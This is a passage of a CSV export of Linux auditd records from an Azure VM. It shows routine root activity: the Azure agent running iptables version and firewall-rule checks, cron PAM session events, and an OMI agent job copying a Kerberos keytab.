'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+15,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505647.336:9077937,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=557e5d63ebb8', 'a1=557e5d63eb70', 'a2=557e5d63eb88', 'a3=7fbd84f4f810', 'items=2', 'ppid=28084', 'pid=28085', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+16,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505647.340:9077938,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174bf8f2d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28086', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+17,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505647.348:9077939,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=562d4c4dc7e0', 'a1=562d4c4dc728', 'a2=562d4c4dc7b0', 'a3=7f394b075810', 'items=2', 'ppid=28086', 'pid=28087', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+18,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505652.356:9077940,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f96950', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28089', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+19,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505652.356:9077941,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=557c00d4fbb8', 'a1=557c00d4fb70', 'a2=557c00d4fb88', 'a3=7f38b1e5d810', 'items=2', 'ppid=28089', 'pid=28090', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+20,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505652.356:9077942,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f96950', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28091', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+21,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505652.364:9077943,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55d027ebd7e0', 'a1=55d027ebd728', 'a2=55d027ebd7b0', 'a3=7f2edb3ac810', 'items=2', 'ppid=28091', 'pid=28092', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+22,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505657.372:9077944,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c263f50', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28093', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+23,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505657.376:9077945,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=558278ca6bb8', 'a1=558278ca6b70', 'a2=558278ca6b88', 'a3=7f88292f8810', 'items=2', 'ppid=28093', 'pid=28094', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+24,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505657.380:9077946,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c263f50', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28095', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+25,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505657.384:9077947,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55c63197f7e0', 'a1=55c63197f728', 'a2=55c63197f7b0', 'a3=7fabbc17e810', 'items=2', 'ppid=28095', 'pid=28096', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+26,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505661.436:9077948,"[{'USER_ACCT': ['pid=28097', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:accounting"", 'acct=""root""', 'exe=""/usr/sbin/cron""', 'hostname=?', 'addr=?', 'terminal=cron', ""res=success'""]}]"
+27,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505661.440:9077949,"[{'CRED_ACQ': ['pid=28097', 'uid=0', 'auid=4294967295', 'ses=4294967295', ""msg='op=PAM:setcred"", 'acct=""root""', 'exe=""/usr/sbin/cron""', 'hostname=?', 'addr=?', 'terminal=cron', ""res=success'""]}]"
+28,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505661.440:9077950,"[{'LOGIN': ['pid=28097', 'uid=0', 'old-auid=4294967295', 'auid=0', 'tty=(none)', 'old-ses=4294967295', 'ses=196095', 'res=1']}]"
+29,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505661.440:9077951,"[{'USER_START': ['pid=28097', 'uid=0', 'auid=0', 'ses=196095', ""msg='op=PAM:session_open"", 'acct=""root""', 'exe=""/usr/sbin/cron""', 'hostname=?', 'addr=?', 'terminal=cron', ""res=success'""]}]"
+30,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505661.444:9077952,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55f338731e26', 'a1=7fffa6893a10', 'a2=55f338731ed0', 'a3=7fffa6893ab0', 'items=2', 'ppid=28097', 'pid=28098', 'auid=0', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=196095', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=5B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29205D202626202F6F70742F6F6D692F62696E2F737570706F72742F6B747374726970202F6574632F6B7262352E6B6579746162202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162203E2F6465762F6E756C6C20323E2631207C7C2074727565']}, {'CWD': ['cwd=""/root""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D63005B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F']}]"
+31,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505661.444:9077953,"[{'CRED_DISP': ['pid=28097', 'uid=0', 'auid=0', 'ses=196095', ""msg='op=PAM:setcred"", 'acct=""root""', 'exe=""/usr/sbin/cron""', 'hostname=?', 'addr=?', 'terminal=cron', ""res=success'""]}]"
+32,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505661.448:9077954,"[{'USER_END': ['pid=28097', 'uid=0', 'auid=0', 'ses=196095', ""msg='op=PAM:session_close"", 'acct=""root""', 'exe=""/usr/sbin/cron""', 'hostname=?', 'addr=?', 'terminal=cron', ""res=success'""]}]"
+33,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505662.392:9077955,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c08d810', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28099', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+34,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505662.396:9077956,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5645f6479bb8', 'a1=5645f6479b70', 'a2=5645f6479b88', 'a3=7f16ab329810', 'items=2', 'ppid=28099', 'pid=28100', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+35,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505662.400:9077957,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c08d810', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28101', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+36,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505662.400:9077958,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=559da997c7e0', 'a1=559da997c728', 'a2=559da997c7b0', 'a3=7f3528c93810', 'items=2', 'ppid=28101', 'pid=28102', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': 